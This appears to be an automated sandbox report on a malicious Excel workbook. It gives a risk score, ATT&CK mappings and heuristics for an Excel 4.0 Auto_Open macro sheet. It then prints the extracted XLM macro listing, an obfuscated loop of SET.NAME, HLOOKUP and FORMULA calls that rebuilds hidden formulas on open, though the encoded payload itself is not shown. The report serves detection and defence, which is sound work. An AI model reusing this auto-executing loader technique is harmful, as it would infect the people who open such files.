MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The file contains Excel 4.0 macros, specifically an Auto_Open defined name, which is a critical finding indicating potential malicious execution. The presence of dangerous formula APIs like RUN further supports this. The macro sheet is likely designed to execute a payload upon opening, leveraging the Auto_Open functionality for initial execution.
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6414 bytes |
SHA-256: 9eb47aa07cd8b3951478134326be2e87030f30f5932eddd0b442f0d427976b06 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - SZW
' 0018 20 LABEL : Cell Value, String Constant - AMkZH len=0
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!C186
' 0018 20 LABEL : Cell Value, String Constant - cdPxo len=0
' 0018 24 LABEL : Cell Value, String Constant - cpjfppJMU len=0
' 0018 20 LABEL : Cell Value, String Constant - HuicZ len=0
' 0018 23 LABEL : Cell Value, String Constant - KcWCTNQH len=0
' 0018 26 LABEL : Cell Value, String Constant - LBttNYhgMTm len=0
' 0018 22 LABEL : Cell Value, String Constant - Mslbrce len=0
' 0018 27 LABEL : Cell Value, String Constant - MYFAJXIdTbFt len=0
' 0018 27 LABEL : Cell Value, String Constant - NBkAaBOzwQTr len=0
' 0018 22 LABEL : Cell Value, String Constant - NXphrFs len=0
' 0018 23 LABEL : Cell Value, String Constant - PBaRWpRQ len=0
' 0018 27 LABEL : Cell Value, String Constant - pCUbucibfrEN len=0
' 0018 23 LABEL : Cell Value, String Constant - qyRnKusj len=0
' 0018 26 LABEL : Cell Value, String Constant - RhKyXZPOOki len=0
' 0018 23 LABEL : Cell Value, String Constant - TBoUVFDw len=0
' 0018 23 LABEL : Cell Value, String Constant - xiOoyePn len=0
' 0018 27 LABEL : Cell Value, String Constant - YIAUuESTwCkT len=0
' 0018 24 LABEL : Cell Value, String Constant - YNAogLqBY len=0
' 0018 22 LABEL : Cell Value, String Constant - ZEnVOht len=0
' 0018 27 LABEL : Cell Value, String Constant - ZywdyOvnBMkk len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' SZW,C95,"SET.NAME("ZywdyOvnBMkk",VALUE("0"))",""
' SZW,C97,"SET.NAME("YIAUuESTwCkT",ZywdyOvnBMkk)",""
' SZW,C102,"SET.NAME("HuicZ",ZywdyOvnBMkk)",""
' SZW,C104,"SET.NAME("qyRnKusj",COUNTA(LBttNYhgMTm))",""
' SZW,C109,"SET.NAME("pCUbucibfrEN",COUNTA(NXphrFs))",""
' SZW,C113,[],""
' SZW,C117,"SET.NAME("cpjfppJMU","")",""
' SZW,C119,"YIAUuESTwCkT",""
' SZW,C122,"SET.NAME("xiOoyePn",HLOOKUP("*",LBttNYhgMTm,YIAUuESTwCkT,FALSE))",""
' SZW,C126,"TBoUVFDw",""
' SZW,C131,"SET.NAME("MYFAJXIdTbFt",ZywdyOvnBMkk)",""
' SZW,C134,[],""
' SZW,C136,"MYFAJXIdTbFt",""
' SZW,C139,"YNAogLqBY",""
' SZW,C144,"KcWCTNQH",""
' SZW,C149,"PBaRWpRQ",""
' SZW,C154,"SET.NAME("AMkZH",VALUE(HLOOKUP("*",NXphrFs,PBaRWpRQ,FALSE)))",""
' SZW,C159,"ZEnVOht",""
' SZW,C162,"cpjfppJMU",""
' SZW,C164,"HuicZ",""
' SZW,C169,NEXT(),""
' SZW,C171,"RhKyXZPOOki",""
' SZW,C175,"SET.NAME("f",INT(T(FORMULA(T(cpjfppJMU)&"",""&T(RhKyXZPOOki)))))",""
' SZW,C179,"NBkAaBOzwQTr",""
' SZW,C181,NEXT(),""
' SZW,C184,RETURN(),""
' SZW,C212,"SET.NAME("cdPxo",C95)",""
' SZW,C217,"LBttNYhgMTm",""
' SZW,C219,"SET.NAME("NXphrFs",R55C14)",""
' SZW,C224,"SET.NAME("NBkAaBOzwQTr",235)",""
' SZW,C229,"SET.NAME("Mslbrce",3)",""
' SZW,C234,cdPxo(),""
' SZW,C235,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.